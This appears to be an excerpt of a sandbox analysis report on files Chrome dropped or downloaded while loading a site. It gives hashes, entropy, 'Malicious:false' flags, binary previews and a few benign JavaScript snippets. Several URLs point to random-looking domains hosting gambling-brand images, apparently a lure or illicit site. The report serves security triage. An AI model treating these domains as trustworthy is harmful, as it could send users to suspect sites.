                                          Preview:.PNG........IHDR....................gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs...........~.....IDATH..=hTA.....(b.@..B.X..D.....B.R.$.6Z(D.M.B.Z. APK.....&.....L.%._4.g..8>v...43..w...B.V/.4O..Qu.%....^...c.N.z..U.^.Q...z%.Gk.w.....A.z'3x..H\gZ.Y.....wO.2.....`Z.,..(...2..zE}.l.:...v.;.".v...q!...ci.xD<[6..tn...._.u8...i.PD...*i|.......&L..D.@i..;"~.....S+.1O9l..V0.........*R...i..*...e...........v.U&..j....3.L-.z..jp...........R......&.v...Iu "&..(........V.3.bE.....U......'.HD..w<.&.).9.X.1.A...v.@.....FA.[.M..V....:3..V...GI.E....^...:..?.4....I.m...B..6.5.....g.._.>..7..E..@4.......IEND.B`.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 17340
                                          Category:dropped
                                          Size (bytes):4031
                                          Entropy (8bit):7.951043479428025
                                          Encrypted:false
                                          SSDEEP:96:3vr/VW5yfLX072+gQ6QP9y0gO+YygZH19PI7yziG:fr/VW5yTM2vLu9y3OByYH19tziG
                                          MD5:3A90921ABC0A5219AD4E664BDE3E21E0
                                          SHA1:FFBC673A0954970A87F93506625F066522959388
                                          SHA-256:41F06410D8ADF8C53247DBE6C9972165E4A9835C8089CF5BAC8198900AAABEB5
                                          SHA-512:5A6692D358CF69F398BDC8BEFC0EEA3641927D019C15B62D352DD15F9D8BD7E4A2CA72BCB89686C13AC891AE59A3A779A0B7FE7F598A193A20F77102F240A691
                                          Malicious:false
                                          Reputation:low
                                          Preview:.............S...w...&c....:....&460.n..x4B:..q..;.a.f...'.w(...I.;...p....O...o.vowoW..G..0....o..)...c._.g.f...m..se...s...3..,..=.c{.7_5.!4.c....7Z...O....6n>._.~....rc.....g.921>..l.........X.!! ~}...?..6[...W.....x63561....Y.%..o.Z..."..X....G9...........ht..Q..Ld.QV4.-6>Zo.=..q..|....H.sdl$..:6.%\.'.8DQ.tSG.B.=.l.A.G.3.2.....7....#..*.....4.2.^y.L..y..-xf./9kzS./.G.....U*.k..9....M..(.K..B.hV..&..R.+...A;Up.9.u... .,..q.^{&.?4d.........H.aj.c.0+...l.*T.x....G./...... ..B.....> 3..C$.R.......?...2........c.w..@X.\.b&....5n<.......\?.._{....N.....X...S.6...$..".I.P<..N..p.....@.+2..o.P...!qy..4.(.*..B.}..(....F..F.:.....({..9.1S@....a..$yY....y....jk.N4..7.v.........5.@..D'.t.C.O.L6...K.v.5@Tp.b...bn.Y..?.V.%.>k.?....mY...7..Qm.......~(9i........R...#..v.........d.)..3!.............'...D...H.n&.)^.Pa.Q......w=.B.Rs..P.k.;.]./.B..C.__.|..u.r....\.g....3Ke.j+..&.L;/_5o.0U."8......J.............*..@.A.".....
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 1268 x 951, 8-bit/color RGB, non-interlaced
                                          Category:dropped
                                          Size (bytes):1374604
                                          Entropy (8bit):7.986482750228935
                                          Encrypted:false
                                          SSDEEP:24576:YbB/1PrkhyGp+l4335anFfg2uXPBy+USB9CTxeVZf3ekrpUfXt8pzY4Yg70juzdp:YB/14hh5i22uppTGTx4Fuk6yzYvgIjuv
                                          MD5:13BE20973C37817A5D1570D2AED02D91
                                          SHA1:4F411AB2B3284CAC91915F6C4C3688745A5305F2
                                          SHA-256:680C22CCBE37BDB7F4198A91AB3E319C9AAEBE9A82603A1572CE2E6F3D28369F
                                          SHA-512:F3FC759BFBD1D38A121001B7586F938919381E619DDC5C122681B37D0BB84214A7D893F382C641D0C2A842C18DF4BC8F382EF27E51D67BF300A7BB83C7255B48
                                          Malicious:false
                                          Reputation:low
                                          Preview:.PNG........IHDR.............+..t....pHYs..!...!........ .IDATx....$9.%....G.n.Y........@.p...._....../3....f.}P...UxTv.pLJ.,.a.^.*........?...fff"""....?UU.z....n....,..r9....\_.....Zk..ZJ..]Uk.f.|9.......}._..U...l..eYZk..3.:.....T....r....RJkMD........jf.....T;.[...^..@2x.o.L.y+./T..0..).WXk.2.f.UU]G.z.w....ZC=...d..v.x.h.E.{%.RW......;.b.Ae.?...t..7.....p4..;. C..p.}x.-2r@.W....m.%.........q...e.J\.,.........~.C...j.-...=..(b.3...hkY.<d..R.m..p#^-..{(..DI6...U1%.....r6..I..m9....rql.Nv....B..(.f....{.10...z..MF....x=.......*,..... ..8....'n..5.....m...5..Q.. .214.J...N..Y....n.....yxx(.<==.C>....N.;.m.\.^'d..EG..;s..].$.~.e.......f.z.*~rF.ms..7..3..*YG..A.L.^......-...e..............M......AQ..Y.[o..z..2sJ.z.`V.!.....svPm.,...va..0.bZ..+...{i...u..*7g.V.YSUq~....-....;ePnf...'........Dz.#".....EZ)E...&.m..x<........B..0...9........f/....T.r...g.LF5..$....b..@..g......3.."U-r%~.w..]t.qkmo..n.N.{...sq>.]2....a.].3........... .\..
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1356
                                          Entropy (8bit):4.929350812923925
                                          Encrypted:false
                                          SSDEEP:24:ggOCxfFJRBvkizPMXn2kSXcMFk0koAyIn6XcMFfY/+a/fgHGNNUOIz5TU:x9j/vk9X2v9C0L19FUj68ZyU
                                          MD5:FD24AE63F2ADD176F3C498B8C2AAE15A
                                          SHA1:3C9CCF52CEA223409FF472F78908FE73E5B822DF
                                          SHA-256:A1A6355F5D3038D181B35972E29964227A00C96AA7111235389F23221A5CF834
                                          SHA-512:2652A3DCB677A48B544663DBDAA3C21E1BDDEA8DD3A272485E874A205A516A8792FA7D8E548F1CCDA4BA57076879265D75F4BDFBC33AAFC819B049AE34B421CA
                                          Malicious:false
                                          Reputation:low
                                          Preview:./*........disabled, ........enable; ........., . onsubmit ........ .....formfuncdemo.htm..*/..function VsbFormFunc()..{.. var _this = this;.. _this.disableAutoEnable = function(o).. {.. o.disabled=true;.. setTimeout(function(){_this.enableOnComplete(o);}, 500);.. }.. .. _this.enableOnComplete = function(o).. {.. if(window.document.readyState=='complete').. {.. o.disabled = false;.. }.. else.. {.. setTimeout(function(){_this.enableOnComplete(o);}, 500);.. }.. } ..};..function changebase64_util(nameList,formName)..{.. if(!!nameList && nameList.length>0).. {.. for(var i=0;i<nameList.length;i++).. {.. var realName = nameList[i];.. var tmpName = realName+"_temp"; .. try{.. var tmpNameObj = eval("document."+formName+"."+tmpName);.. var
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 250 x 250, 8-bit colormap, non-interlaced
                                          Category:dropped
                                          Size (bytes):6928
                                          Entropy (8bit):7.953647279949998
                                          Encrypted:false
                                          SSDEEP:192:ic/wi2N9CN9PKE+xsWJ8Ihe9+dkJfWW/M:nN9CE+KZwqJfA
                                          MD5:4F9F1C048148B5759DB7C70D4427CA5B
                                          SHA1:40006416FCDC12C925F6069ABA457B2B85552AE0
                                          SHA-256:26B6D720A2DF9DA5151756FD37EC0C69651304677250BE9D7246936835E5ACEC
                                          SHA-512:07E2BA66990B3264D29482D0ABBC72BB43CDA4A94A839CC91579B98692568F67AFBDE43A74A44C8F8170A29947769696C6614B670F762BA2950A15ABB8101559
                                          Malicious:false
                                          Reputation:low
                                          Preview:.PNG........IHDR..............2......PLTE"""...""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""...............)))............444......FFF///www@@@;;;...............kkk...oooKKK......sss]]]...bbb..................SSSWWWOOO...|||ggg............A..C....tRNS......~`1...XU.........IDATx...Yr.1.EQ!.=7c.... ....._...r.l...2..sIM.....}R.R.....T-k...U.~a......W.+.S.B....F...9.......>......!..&.........=+......K.+....xMo..^..x..9..R.N.t?.&m...6.j0..{.....5.}.d?.*.y.j.+.".(.".(.".(.".(.".(.".(.".(.".(."..]+Qj.....;.............G.n..fg.S...3/.bEV..u....C.w...#.P.....?.=.....@7./...:.X#..9..."......?...&.[t..Q....AW...'P....0u...G.B.....o.........%..E.Ph.........=.]..5h...I..>u!.".:.,....\gjP...?K..W.....Cs.X.A.2.%E.ql..N.G...M.....6;Cw.aE...c......@...A?`Y..>.............<..X`....@.-%?m.....9..Rs....L.>.>!ypDY...7....HS.....hU.uf.....E.{.......|.P`...^.$...N./L.}..68o.,...)...K./...w..........r..!)..SGl].[<..<..<.KLI.!..<.....|5..f.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 2481
                                          Category:dropped
                                          Size (bytes):808
                                          Entropy (8bit):7.747604150802558
                                          Encrypted:false
                                          SSDEEP:24:X0yR/5FR3vL097imTFKuPnt5fXgUy5ZMpTg:X0QFxvyPTF954UEZMpTg
                                          MD5:E0D8F1FCC392EC41020548FA0262F0C8
                                          SHA1:1E3352811AC8805E9F16A6998AFDD60B5A8F44B9
                                          SHA-256:3185298168A57268AA370975E9DAB3EC553ACA0081C40EDBD28E56FB26982F42
                                          SHA-512:97541B57853EA9A498EDA116EB724AA96E0E18571EE62272F2C16C3D7776265B49832BC5862E8AFBF0E18DFDB4F0897F932E556F4D1966C086684ADC2B870CE9
                                          Malicious:false
                                          Reputation:low
                                          Preview:...........VKo.0..+.R46"(;.u........v..B...c{..60..G=...z.a.$.E....T..18+..]@v$k.)b_.I.h.[f .,..E<.........P..U.|...Q..._.j..8....p..5bi{..o..>.h..0'9D..e....u.G+..N.....\.l6..w<...'T;z..;u.....R/..:i......y....Lk^+.^{...>.8F...C2.~....^\D......^7Ud*pL.+..7!....d.&...G.x.:....wt...3...."...O....b..Yn,]I./)'.K.._{C.....P>..'.?...K...W.$yU.k`.p.%..N{'.Rl.D.....Y../.........h...KT..#..0....Q.lZ....B..;D.V....7E.K._.eM....U..5.....fK.n.asdvh.w.p.........!...h.........p.Y.z..R.c...>.T..X&X].p,);p...x.0^O...r...h(....E......W..X.aV=...........%.T..8...]|j...G`*...~%.+e..3,.s:..NL...h>W..i.....P..../.B...G^.>.yK...('i.$....d...7.YrH.D.f...D"s.e...\......a...be..0..p$....J..mxZ....f..[.d1.P...u7....?y....._.j.G..{q....cQ.ss...8.W./.ic$"..[..+.T.d......D....
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                          Category:downloaded
                                          Size (bytes):1356
                                          Entropy (8bit):4.929350812923925
                                          Encrypted:false
                                          SSDEEP:24:ggOCxfFJRBvkizPMXn2kSXcMFk0koAyIn6XcMFfY/+a/fgHGNNUOIz5TU:x9j/vk9X2v9C0L19FUj68ZyU
                                          MD5:FD24AE63F2ADD176F3C498B8C2AAE15A
                                          SHA1:3C9CCF52CEA223409FF472F78908FE73E5B822DF
                                          SHA-256:A1A6355F5D3038D181B35972E29964227A00C96AA7111235389F23221A5CF834
                                          SHA-512:2652A3DCB677A48B544663DBDAA3C21E1BDDEA8DD3A272485E874A205A516A8792FA7D8E548F1CCDA4BA57076879265D75F4BDFBC33AAFC819B049AE34B421CA
                                          Malicious:false
                                          Reputation:low
                                          URL:https://www.ccsurj.org/system/resource/js/formfunc.js
                                          Preview:./*........disabled, ........enable; ........., . onsubmit ........ .....formfuncdemo.htm..*/..function VsbFormFunc()..{.. var _this = this;.. _this.disableAutoEnable = function(o).. {.. o.disabled=true;.. setTimeout(function(){_this.enableOnComplete(o);}, 500);.. }.. .. _this.enableOnComplete = function(o).. {.. if(window.document.readyState=='complete').. {.. o.disabled = false;.. }.. else.. {.. setTimeout(function(){_this.enableOnComplete(o);}, 500);.. }.. } ..};..function changebase64_util(nameList,formName)..{.. if(!!nameList && nameList.length>0).. {.. for(var i=0;i<nameList.length;i++).. {.. var realName = nameList[i];.. var tmpName = realName+"_temp"; .. try{.. var tmpNameObj = eval("document."+formName+"."+tmpName);.. var
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 2088
                                          Category:downloaded
                                          Size (bytes):797
                                          Entropy (8bit):7.76373736359512
                                          Encrypted:false
                                          SSDEEP:24:Xh54rz6dA/utp99m/R1M1//ZhJjF2+NqunH:XSz6dhp9Us1/RbNqsH
                                          MD5:1BE1D6290006E67BCB2FACDFA571A4D1
                                          SHA1:F5AE95AB95254A0834B9155E3594EF814F8C6837
                                          SHA-256:02CB7CDD1B17375D306F6A4E3A16BA8B064166FCEFFD4BD45AF5ADC0AE37E894
                                          SHA-512:4A90CEBC7FDACB4B92222F6A359761E99A14D8A7302747A3A3825EBDBECEBF0D9F20FBFC72560EF99FA4E5CDFD63120F544CEC9DB0BAC2DC03CC8D9413487227
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p3yw7u.innittapp.com/ftl/commonPage/js/websocket/PopUp.js
                                          Preview:...........V[O.@.~.......51.a.Q./..&..1d...-...KH.E..........`..5&.e.7..'..3...>..y..9....o.[q......T...=K.e......&1... X.8@MQ.fVG...Cy..*I.Q....!..<..&.t{N. .....9...a...T.b..................}I..v...2.f.....{..W...}.......o../.....s.x.l~..o.....U.......{.L.O.a.u.:l*K.wR;.da.9A...8,...#K.2...c#......if....<g@..y..E"......@T..T..9.1-....,........a..b.....j...p."M.3r........?....o...r.?Z..a.e+...z..U.W.%.....A:.1z..b@U.lx9...E1.:.k%..M.a....4..}E....Qq,.Ft. .kc. ...d...Q..UD.l.......itDmG.i....XZ6|zD....Z..H.R..pm..........B.J.Z.......W..u...&...,..ZR...O#..N...]e...F...%..oo....O.u...........P.T9#5hP.W.x."vh.M.sC*.......A8...+......+....[.o..L.L.....F7.z.&..~.G......BmQ]5...O....F..kk...crj.....F.7l.0..5.L.I....[R...:j.........p_.q.(<.....F!2(...
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:downloaded
                                          Size (bytes):227
                                          Entropy (8bit):4.64325217917325
                                          Encrypted:false
                                          SSDEEP:6:YEm6hUmWE2Y3xoFcNsDWmC9mWFuk72Y33LxrCsJvEIRfA:Bm60ELxoFcN31tHL9rc
                                          MD5:34BE6641E0DABBA59E9C220BB9658A67
                                          SHA1:CFAE59F1DC1373226B1AF787B035012D5F11FCD5
                                          SHA-256:31BB9CE7F929BFC71E37C0C62DD4194C2B6DC5F3B75E19973F84C0BA633814D3
                                          SHA-512:D5AD3BB399A30626C114861573703A1BDAE7C4F6AE51B8B17DD0595A4BBFC35B19777B6203069272B4C3AB8A682FEDF2BD993550BD4A783B12F0F7E1498F4673
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p3yw7u.innittapp.com/061410/rcenter/common/themes/base.css
                                          Preview:.modal{text-align:center}.modal:before{display:inline-block;vertical-align:middle;content:" ";height:100%}.modal-dialog{display:inline-block;text-align:left;vertical-align:middle}.tr-selected-row-color{background-color:#e6f3fc}
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 32727
                                          Category:downloaded
                                          Size (bytes):5207
                                          Entropy (8bit):7.960518809198506
                                          Encrypted:false
                                          SSDEEP:96:pLzZOKTXT9atAFsvyIV/PicwofN6DDfO8F5HQ9DrioRUUwzwvBMQj1aSejt:lZROAFCV/Pd6PfZChUUwzwvBMQteh
                                          MD5:3BDCFF823CEE54E2337932CB9D306566
                                          SHA1:436AB9AE33ED90D9A1FE087E25540C7DC381589A
                                          SHA-256:080D1C38ED29B8790CD5831C14FD5431FBB7650721CEDA323F9B8C467E8D60A9
                                          SHA-512:BD360C5004CEB422CADD4A4834CCBA96A98DEDD997DBADFDC1F3851BD8271957DD7B56E473E32FEE4231D582A8B66167F562091E61DE260553BB9E7CF5108A33
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p3yw7u.innittapp.com/061410/rcenter/common/static/js/gb.validation.min.js?v=1736150851437
                                          Preview:...........=k...q..+F...}."wy..".6b.)$6H.0..7...ff.w'..'_l..$!......N..0. A...c...O.......LwO....5,.n...........9]......9.8...u...<y......w.6I..E-...{.D.dA..ZB=.4!So5Ob..5...d.lu...p....F&.\....iL...W.~..I.39[.=?.`...p..?....?...?....../?...,.O....xL........g._nw...../......:."2.H|.D*...g..W%e...{.L............0.'..$9.@...3....v...n....r..y8~T.[...Ek....xN..M.../."58.&.7(..?..b...].?!..*.I..cr.."..>g..*0f...2~.&.K.>.`$..$....>...p.-qc.{.,!.....p...#.O.[Fa...6.....;...w5......7....-...q./VH........~.'q.E(=..q89...Ir.H...$.(p..<&.....M]......p. K..9Mw..b.>&..|N..:S...$<..m.J...Y..C.Jl......$Y.a.`^V.........z3..l#,2.........$\.O(CVS.c.P)cS.....$<.6.n..&.{...... H.G..m.`.u...h$t$ .$.j.(..#..X-7...6...n..^].!......?.@......W8..P6.u..J....*?..........2........T.v..4.(..............8".,9y.Dc..6.^..o.I3Oo.t.#.....nBwgU#...ET..nv...l9....EGL.j...x.....}gK'B....4nO...x...........p....o.89..}....59...PF......!u#...l/@........i.M.F[.>S
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):6767
                                          Entropy (8bit):5.512301770404852
                                          Encrypted:false
                                          SSDEEP:96:KrdCAknFANT9UpcOb1BiEUGqcaiAviAHuviwv+0JfiAHXKrjQ9K8pbaIiofi1MPr:Kr6niN9UpcOb1wEUaq/YK8EdiNuxeZ
                                          MD5:910B0BE124413CB49C6B9BB007BAF456
                                          SHA1:FF4CAA611C6477983C297B9D28AFA66ACBFDBD90
                                          SHA-256:2E4F07CA3E11CC046FC9DFE772E4C7A8534FD8B4F1F85DF21902C07534DC0390
                                          SHA-512:E896CB14966EDB96F8ACED3AE2CA4D2C1C7DAA07472AE0CC3246F592B9B31015F7B29CE59CE2AF8B8CB546836106493B1EDB21085AFAEBD6F644DF6D7BA7634B
                                          Malicious:false
                                          Reputation:low
                                          Preview:.//..XMLHTTP......function createXMLHttpRequest()..{.. var xmlHttp = null;.. try{... ..xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");... }... catch(e)... {.... try{.... xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");.... }.... catch(e).... {........ try{........ xmlHttp = new XMLHttpRequest();........ }catch(e){........ }.... }... }.. return xmlHttp;..} ....//......//url: ......//fun.......function startRequest(url, fun,xmlHttp)..{.. xmlHttp.onreadystatechange = fun;.. xmlHttp.open("GET",url,true);.. xmlHttp.send(null);..}....//..xml.....//father......//name........//...............null..function getXmlChild(father, name)..{.. var es = father.getElementsByTagName(name);.. if(es.length == 0).. return null;.. else.. return es[0];..}....String.prototype.trim.= function() ..{ ..
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 131378
                                          Category:downloaded
                                          Size (bytes):37907
                                          Entropy (8bit):7.9925501749787555
                                          Encrypted:true
                                          SSDEEP:768:e2dpyKDvQzNFi908Jv01CjXlMaynUlrm+hehpNS6AyAIhYIfyNg4:/dpyKDvQziJv0wjXlMaw+rml0yAI9yR
                                          MD5:947C3DB7C50F188F554ECB0263023BCE
                                          SHA1:0ECF9E31CB099B539CAB9492F43A83286F941D5F
                                          SHA-256:5FD93978CDD4A6013DFEBF96AA6757D74CDC1389F180ED8FC16A138965F94131
                                          SHA-512:04502911D65E22F789AC24072CE7C81774C17D2794836508FEFBF6ABCD4E875040A4C543C9637B3E16FC6D89FCCCF0D5CDACAE608ACEEB88B77AE6D78A6C7C56
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p3yw7u.innittapp.com/061410/rcenter/common/js/jquery/jquery-2.1.1.js?v=1736150851437
                                          Preview:...........mw.. .}..9.1..$.$..4.qd9...F.M. ...Crd..1.(.....^..{..mg.9.sLa..............;zr..?w..............7..f.I........n....w?b......R1...r........\..w.)^Q..Vx.Z...7..gg..........r>..e....f...j{Sl..W...mW......U...j@6.9....EyY,....js}.31....R.'g.99......`.!...u.v.K..{.X]......z...W...u..:.].w."..du..&.N../>.W.meJ..Q.....w..r;.n...fW.C...u.|.......hY....lV.n"...?...L...\..].../....M..m.G..].........T.1.t..A._..b..9q..)..CJ..r..n...ls4.l..t.?+.......`./g[J...U7..?(...>|wE.../fU..A.....]...Y^.>..iT.fV}w.....f..6...n....*.s.....}..`.yB.&.x&r...(...!)..`.d.p..p.j.C*...l.`..o'....._.}...i...?;..6.......P..:9.6.Yu..b}3.OO............g....,%..l....v[l........0...~....z..x.x...+8.....5...r.$...z{3<../7..GO......%..Eb..\.[_n..........b1..ggc.0..=....CM...f.Ho.....|...m....o..uA..f..4..#(.x)..G< ..&S.kM......}V..o|.......6.....E..,,..ng.f..:..F......p=.P..U.v.a.I.M.).I.l...7..l.^|...dZJ.6rUn..F...gP...CEN.P...(y.`.sC...W..%..$......<..:.w..x
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 4433
                                          Category:downloaded
                                          Size (bytes):1421
                                          Entropy (8bit):7.871345807581825
                                          Encrypted:false
                                          SSDEEP:24:XZ+aoBy+/ERT8toLO4KwppHbAZr3fu+6oyMyDuau6husLCMAws7zG:XAx/IcIOTwHbAZrvu3FpuaLAlK
                                          MD5:1E4E9F51375B084A5459F174B6749B60
                                          SHA1:CF92E8319B5AFD4AAC588DE5073C7D5D470A1AA7
                                          SHA-256:71D123AC7AF06A251719002717D0B2806F7E1C43450E559196B517C308110A19
                                          SHA-512:D87F3C0B58F9841622E4364BD6CDA3256EDE9A918F42853632BA3C1AB9F9A702241920D033C16F8558A2B1F11EE68D915730DCC1E110BD28630FFBFB4BECD841
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p3yw7u.innittapp.com/ftl/commonPage/js/jquery/jquery.super-marquee.js
                                          Preview:............mO.F..0+.|.a.N.b..u.Hc.k.~@.9..\...>C;..}.;80.."..s.....".,...&..?.Ye...gI}.RJ,FY.O...>.CC&!..i..].....]'m..l.......5!M.o.+...;......I.2..W.....).g.Z.~tww,...xy..7.]o....ni..u.ayV.. |f.X....*..._....kE..U.f...4B........^.]<t<.f..........k.N3.....8.T;....J."...7.h$$....\\.S.n.d.N...?@.;.q....M.K..=.V/..=<..?...w.9..m..b.V.`.O7m..N*I.3/4.....Y...{....(..~..x.j.l*-^../.3P.-$.....a.6..M%.....h.....,...[..S........l.......L.>..UA....x..Z...t.#...m.......J.>B......D6...i....`..d.h}Q........nxRs..\.B/g..M...Z.1\1.+E.[0.7H.A...TmX..br.0.....d.......1$(......'...........h.d.......cT..q.......h:..Lb)....D...K.b.r......n..].4..`[.Y..P..K|u~K..+..6Y...x.9M.....6.}.....H.5.].e....#F.L.{p....[M|.........%.....y2.HA..D...N....7#.cr+Q..a...[^.N..?..Hm.W.......=.EC.A.....U..w.HQ<....M.F.K..>\...1~.*.xOU.P^..r.:34.=1W=I^/.....7h..hV..+......~.<x..m...q8G..i..u"h..<..0.t\EX.:g..)e.O.....].d..W...'..5>..k...f..B%o...v.&.H.....y.q.4Uq]..
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 250 x 250, 8-bit colormap, non-interlaced
                                          Category:downloaded
                                          Size (bytes):11205
                                          Entropy (8bit):7.960277474462424
                                          Encrypted:false
                                          SSDEEP:192:n2xLuGiAwWCPL6DLIA9PnrUrqTDlgsjpkbK7akvawa8BAULBEANfZ6eLoOI70N6h:2x3iAIj6QwPgQvpkOOkval8AQMTQoFWm
                                          MD5:65FB72A68B9DCA68ADE34ADA3253FC2A
                                          SHA1:5260A46F7843F885A7552940A68975ABF2D62BC7
                                          SHA-256:5BC5DD8A9766BB21896DB9DB9EA8C03E0F16098F1EB46C6BF3F8A33E57D33702
                                          SHA-512:D72B4660ECF6825888E7FEAEE64A3DA20172155A9143342147407C02025671761A6DDAF617E6D1A8297F5FA3D22980CA05ABEEA32AD0423A40DA71BEFAD29493
                                          Malicious:false
                                          Reputation:low
                                          URL:https://1k4ej4j1lxvjwz.com/imgs/bet365.png
                                          Preview:.PNG........IHDR..............2......PLTE.._ .g..c..a$.i%.j..b.....e..b..^..!.....a".h..`.|X.....[.~b..c.....e........e.{d..`*.m....{h....yT....ye...H...~h.....!..^#.]...n.FB.T..... ...K........?.|5.u.wf...$.`..(..b..$.uPj...yj.. ..'..6.YK.R..Bu.G...;.x..;*.\...[............Z.O......e....5..9.."..3..-/.Z........@..!....0...F.WR.Sg.Lm.K..1............/.q..>..>....7..&......`.N...y....+...a..=.U.....;s....B..+..(..!.}_=.ZQ.Nd.I..4U..O....8..,o....&z.C..1..,_.J~.FD..2.]..?..$V.N..<..#....ti..*....nG.V......tRNS.........N..).IDATx.....8...}.#9...j]X....."b.(h@"<.:..-HH .LA..t.._..$...q.ww?n.;\./.9.s......J....~K..?..._~..".5......2.f.F.....#.$.(U....w...#..[ER.!.....EH......O.z,Q........?..YX..................#;5..r]...W.M......FFl.....\.F.{a.....hzB.#`...rH......k\...-.XE..Q.]Q..4.*.g.......n.....E....c.C....;aP7+s...z8.g.....[.K.{n.l.....V...tL.b.......?....D....\7n..j.vB....\.....<".{.H.a...!...(.z..]..8....I..t..3.3.....S..NHd...Fit.P.w.2..5B/<.#...%x...u.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (587), with no line terminators
                                          Category:dropped
                                          Size (bytes):587
                                          Entropy (8bit):5.037025933428312
                                          Encrypted:false
                                          SSDEEP:12:Ab8dkKeCxyWF0gRvJHrtbFKNkM+fpYzObOTks0JM9EaMCz:UWkKeFARvJVgNQpYzkOV8IV9
                                          MD5:286675B3C67670C0F14297E633BE05A4
                                          SHA1:36A200D8AB5D5E37E328700DF90D061F268C57CC
                                          SHA-256:6F1E6A7E89A7B4451921BA1D6EA506A9855D4BFF2EC5F25587BF066516ACF025
                                          SHA-512:D8A6C2C2D605CF93D1397B487B6ECCD7A115DC8334877F555A1F0E7ACB031A57F169F3A4E4CC592C9AA7862ABB8440AE8467B65E2FCC0D60F967678F0BC2D444
                                          Malicious:false
                                          Reputation:low
                                          Preview:function UrlEncode(str){var hex="";var i,t;for(i=0;i<str.length;i++){t=hexfromdec(str.charCodeAt(i));if(t=="25"){t=""}hex+="%"+t}return hex}function hexfromdec(num){if(num>65535){return("err!")}first=Math.round(num/4096-0.5);temp1=num-first*4096;second=Math.round(temp1/256-0.5);temp2=temp1-second*256;third=Math.round(temp2/16-0.5);fourth=temp2-third*16;return(""+getletter(third)+getletter(fourth))}function getletter(num){if(num<10){return num}else{if(num==10){return"A"}if(num==11){return"B"}if(num==12){return"C"}if(num==13){return"D"}if(num==14){return"E"}if(num==15){return"F"}}};
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 309 x 497, 8-bit colormap, non-interlaced
                                          Category:downloaded
                                          Size (bytes):27838
                                          Entropy (8bit):7.978845809426652
                                          Encrypted:false
                                          SSDEEP:768:ENQIj52VS0YMGzCHsbOorT9S3hnQ05bm/hCGCkiZXQ7yHAydwp0C:0j5uYrzmsbOorTknQ0xkCGLNOc9
                                          MD5:48F648A53CD03787CAB32621F6088895
                                          SHA1:408FAC6305133287FDF50315D8212E07F4A0C89C
                                          SHA-256:FA5C757347298A9B2CD0B3823D37D4C1C5A2C75520207F37B61AD9873DF50557
                                          SHA-512:4BFEC883A611D6311350F2266BB168BF8D99B81CE2067A36CFF81447FC684BDB23B1FE5929B767266DF49CD98F8DE314223FB1CD9FE3A5F09C5709A5C3BB6675
                                          Malicious:false
                                          Reputation:low
                                          URL:https://1k4ej4j1lxvjwz.com/imgs/2025shiyunhui.png
                                          Preview:.PNG........IHDR...5.........;......PLTE......3*)...5,,60/...+$#.1d.X.$.....|Q.....Ay.8j!...<p.*'......hA.wI.M..c..W..].pE.\ZY<..D..:55.+].#V...5..`....=.....Jn.....iE.tpo`....P........p.....OX._..z.9..2.+]u..(.......:.....@<;..*..5...b..GDCg..b....Tc.TRQ`x.q.1e...E.....HXj.mihNLKh.$l..f.j.\q....m.(..=..-pM....h...;k..@...d`_.Bv..D...{xwc...J...dB....U^.s.............\F.t..gdc...w....W..b..g........ZZ....~b....aR.....}}..Q.9o..;...QV....rm....S....C.o.sh...I....X\..J.....;s..S...s_......Ss|.Q..?.P..i.._.3.#B3..LQ..Nu..J..l.]dm..,dG..`..N.......}..7..~@.l..u=.p...f..5|Z. ..........j..._.2y..s..s\....w.....%Vd.J......_.....Kc...UA...t....{.....U..............y.e.C{....\.-w.Mq.w.A.K..i.IDATx...K\W....k....D7.h.CqB..0...)..VW2:.e.E:$....6i....$.E..."..H.D.Y.EP...s.=..;.=gLh......{g.m.....oT%J.(Q.D..%J.(Q.D..%J.(Q.D..%J.(Q.D..%J.(Q.D..%J.(Q.D....i...................W..|O..^.[.n....h.....s....z.z.....{..w....~..o.'.;;o..|.....>...>{.,.>.B...V.m.[...*x.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Unicode text, UTF-8 text, with very long lines (491)
                                          Category:dropped
                                          Size (bytes):1514
                                          Entropy (8bit):5.436933824746122
                                          Encrypted:false
                                          SSDEEP:24:wcPZXuiZzlHhRWZRwn2wXY5CfoZ6KKKcPZXuiZzlHhRWZRwn2wXY5CfoZBwgKvHV:nx+6PwA2wX1Q3KBx+6PwA2wX1QLwgKPV
                                          MD5:EA2B8BCF79247F762281B23D66E25CE2
                                          SHA1:A387C9AF7DA6A73DAF4C4B1435E87F923DE683ED
